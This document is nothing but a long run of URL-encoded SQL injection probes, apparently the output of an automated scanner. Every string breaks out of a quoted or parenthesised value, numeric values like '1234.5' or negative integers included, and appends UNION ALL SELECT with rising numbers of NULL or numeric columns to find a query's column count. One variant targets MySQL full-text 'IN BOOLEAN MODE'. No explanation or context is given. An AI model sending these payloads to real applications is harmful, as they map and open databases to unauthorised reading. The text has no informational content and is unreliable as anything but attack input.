1234.5%27%7C%7C%28SELECT%20%27VFMs%27%20FROM%20DUAL%20WHERE%205637%3D5637%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%7C%7C%28SELECT%20%27XDae%27%20FROM%20DUAL%20WHERE%206985%3D6985%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%7C%7C%28SELECT%20%27SZmV%27%20FROM%20DUAL%20WHERE%201430%3D1430%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%7C%7C%28SELECT%20%27ohVo%27%20FROM%20DUAL%20WHERE%207599%3D7599%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%7C%7C%28SELECT%20%27nWYo%27%20FROM%20DUAL%20WHERE%204061%3D4061%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%7C%7C%28SELECT%20%27Tblb%27%20WHERE%205231%3D5231%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%7C%7C%28SELECT%20%27qyTs%27%20WHERE%209036%3D9036%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%7C%7C%28SELECT%20%27wiCA%27%20WHERE%202459%3D2459%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%7C%7C%28SELECT%20%27vMCD%27%20WHERE%202972%3D2972%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%7C%7C%28SELECT%20%27yikU%27%20WHERE%209616%3D9616%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%7C%7C%28SELECT%20%27VaDw%27%20WHERE%202304%3D2304%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%7C%7C%28SELECT%20%27cSAt%27%20WHERE%201217%3D1217%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%7C%7C%28SELECT%20%27vggh%27%20WHERE%207635%3D7635%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%7C%7C%28SELECT%20%27FMSx%27%20WHERE%207198%3D7198%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%7C%7C%28SELECT%20%27qxaf%27%20WHERE%206409%3D6409%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%2B%28SELECT%20CQOl%20WHERE%205917%3D5917%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%2B%28SELECT%20Gtat%20WHERE%201312%3D1312%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%2B%28SELECT%20VzhJ%20WHERE%201836%3D1836%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%2B%28SELECT%20qRrE%20WHERE%209303%3D9303%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%2B%28SELECT%20TFUV%20WHERE%205344%3D5344%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%2B%28SELECT%20ZmRa%20WHERE%208223%3D8223%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%2B%28SELECT%20uqXv%20WHERE%201084%3D1084%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%2B%28SELECT%20ETFk%20WHERE%206098%3D6098%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%2B%28SELECT%20tZYK%20WHERE%207524%3D7524%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%2B%28SELECT%20pqyB%20WHERE%201004%3D1004%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%2B%28SELECT%20%27EGyN%27%20WHERE%203162%3D3162%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%2B%28SELECT%20%27raZn%27%20WHERE%204121%3D4121%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%2B%28SELECT%20%27Znmp%27%20WHERE%204655%3D4655%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%2B%28SELECT%20%27ZVBn%27%20WHERE%202148%3D2148%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%2B%28SELECT%20%27IyQg%27%20WHERE%206042%3D6042%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%2B%28SELECT%20%27tjny%27%20WHERE%201353%3D1353%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%2B%28SELECT%20%27prgJ%27%20WHERE%206122%3D6122%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%2B%28SELECT%20%27sDxn%27%20WHERE%205601%3D5601%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%2B%28SELECT%20%27UPZD%27%20WHERE%208666%3D8666%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%2B%28SELECT%20%27AORa%27%20WHERE%202536%3D2536%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 -2172%29%20UNION%20ALL%20SELECT%202127%2C2127%2C2127%2C2127%2C2127%2C2127%2C2127%2C2127%2C2127%2C2127%2C2127%2C2127%2C2127%2C2127%2C2127%2C2127%2C2127%2C2127%2C2127%2C2127%2C2127%2C2127%2C2127%2C2127%2C2127%2C2127%2C2127%2C2127%2C2127%2C2127%2C2127%23 -7660%29%20UNION%20ALL%20SELECT%202720%2C2720%2C2720%2C2720%2C2720%2C2720%2C2720%2C2720%2C2720%2C2720%2C2720%2C2720%2C2720%2C2720%2C2720%2C2720%2C2720%2C2720%2C2720%2C2720%2C2720%2C2720%2C2720%2C2720%2C2720%2C2720%2C2720%2C2720%2C2720%2C2720%2C2720%2C2720%23 -3938%29%20UNION%20ALL%20SELECT%201405%2C1405%2C1405%2C1405%2C1405%2C1405%2C1405%2C1405%2C1405%2C1405%2C1405%2C1405%2C1405%2C1405%2C1405%2C1405%2C1405%2C1405%2C1405%2C1405%2C1405%2C1405%2C1405%2C1405%2C1405%2C1405%2C1405%2C1405%2C1405%2C1405%2C1405%2C1405%2C1405%23 -4368%29%20UNION%20ALL%20SELECT%201670%2C1670%2C1670%2C1670%2C1670%2C1670%2C1670%2C1670%2C1670%2C1670%2C1670%2C1670%2C1670%2C1670%2C1670%2C1670%2C1670%2C1670%2C1670%2C1670%2C1670%2C1670%2C1670%2C1670%2C1670%2C1670%2C1670%2C1670%2C1670%2C1670%2C1670%2C1670%2C1670%2C1670%23 -1773%29%20UNION%20ALL%20SELECT%209701%2C9701%2C9701%2C9701%2C9701%2C9701%2C9701%2C9701%2C9701%2C9701%2C9701%2C9701%2C9701%2C9701%2C9701%2C9701%2C9701%2C9701%2C9701%2C9701%2C9701%2C9701%2C9701%2C9701%2C9701%2C9701%2C9701%2C9701%2C9701%2C9701%2C9701%2C9701%2C9701%2C9701%2C9701%23 -3425%29%20UNION%20ALL%20SELECT%209461%2C9461%2C9461%2C9461%2C9461%2C9461%2C9461%2C9461%2C9461%2C9461%2C9461%2C9461%2C9461%2C9461%2C9461%2C9461%2C9461%2C9461%2C9461%2C9461%2C9461%2C9461%2C9461%2C9461%2C9461%2C9461%2C9461%2C9461%2C9461%2C9461%2C9461%2C9461%2C9461%2C9461%2C9461%2C9461%23 -8442%29%20UNION%20ALL%20SELECT%201421%2C1421%2C1421%2C1421%2C1421%2C1421%2C1421%2C1421%2C1421%2C1421%2C1421%2C1421%2C1421%2C1421%2C1421%2C1421%2C1421%2C1421%2C1421%2C1421%2C1421%2C1421%2C1421%2C1421%2C1421%2C1421%2C1421%2C1421%2C1421%2C1421%2C1421%2C1421%2C1421%2C1421%2C1421%2C1421%2C1421%23 -2632%29%20UNION%20ALL%20SELECT%203169%2C3169%2C3169%2C3169%2C3169%2C3169%2C3169%2C3169%2C3169%2C3169%2C3169%2C3169%2C3169%2C3169%2C3169%2C3169%2C3169%2C3169%2C3169%2C3169%2C3169%2C3169%2C3169%2C3169%2C3169%2C3169%2C3169%2C3169%2C3169%2C3169%2C3169%2C3169%2C3169%2C3169%2C3169%2C3169%2C3169%2C3169%23 -5736%29%20UNION%20ALL%20SELECT%209348%2C9348%2C9348%2C9348%2C9348%2C9348%2C9348%2C9348%2C9348%2C9348%2C9348%2C9348%2C9348%2C9348%2C9348%2C9348%2C9348%2C9348%2C9348%2C9348%2C9348%2C9348%2C9348%2C9348%2C9348%2C9348%2C9348%2C9348%2C9348%2C9348%2C9348%2C9348%2C9348%2C9348%2C9348%2C9348%2C9348%2C9348%2C9348%23 -2446%29%20UNION%20ALL%20SELECT%206713%2C6713%2C6713%2C6713%2C6713%2C6713%2C6713%2C6713%2C6713%2C6713%2C6713%2C6713%2C6713%2C6713%2C6713%2C6713%2C6713%2C6713%2C6713%2C6713%2C6713%2C6713%2C6713%2C6713%2C6713%2C6713%2C6713%2C6713%2C6713%2C6713%2C6713%2C6713%2C6713%2C6713%2C6713%2C6713%2C6713%2C6713%2C6713%2C6713%23 -1367%27%29%20UNION%20ALL%20SELECT%201930%2C1930%2C1930%2C1930%2C1930%2C1930%2C1930%2C1930%2C1930%2C1930%2C1930%2C1930%2C1930%2C1930%2C1930%2C1930%2C1930%2C1930%2C1930%2C1930%2C1930%2C1930%2C1930%2C1930%2C1930%2C1930%2C1930%2C1930%2C1930%2C1930%2C1930%23 -6987%27%29%20UNION%20ALL%20SELECT%204354%2C4354%2C4354%2C4354%2C4354%2C4354%2C4354%2C4354%2C4354%2C4354%2C4354%2C4354%2C4354%2C4354%2C4354%2C4354%2C4354%2C4354%2C4354%2C4354%2C4354%2C4354%2C4354%2C4354%2C4354%2C4354%2C4354%2C4354%2C4354%2C4354%2C4354%2C4354%23 -9445%27%29%20UNION%20ALL%20SELECT%201367%2C1367%2C1367%2C1367%2C1367%2C1367%2C1367%2C1367%2C1367%2C1367%2C1367%2C1367%2C1367%2C1367%2C1367%2C1367%2C1367%2C1367%2C1367%2C1367%2C1367%2C1367%2C1367%2C1367%2C1367%2C1367%2C1367%2C1367%2C1367%2C1367%2C1367%2C1367%2C1367%23 -5623%27%29%20UNION%20ALL%20SELECT%207607%2C7607%2C7607%2C7607%2C7607%2C7607%2C7607%2C7607%2C7607%2C7607%2C7607%2C7607%2C7607%2C7607%2C7607%2C7607%2C7607%2C7607%2C7607%2C7607%2C7607%2C7607%2C7607%2C7607%2C7607%2C7607%2C7607%2C7607%2C7607%2C7607%2C7607%2C7607%2C7607%2C7607%23 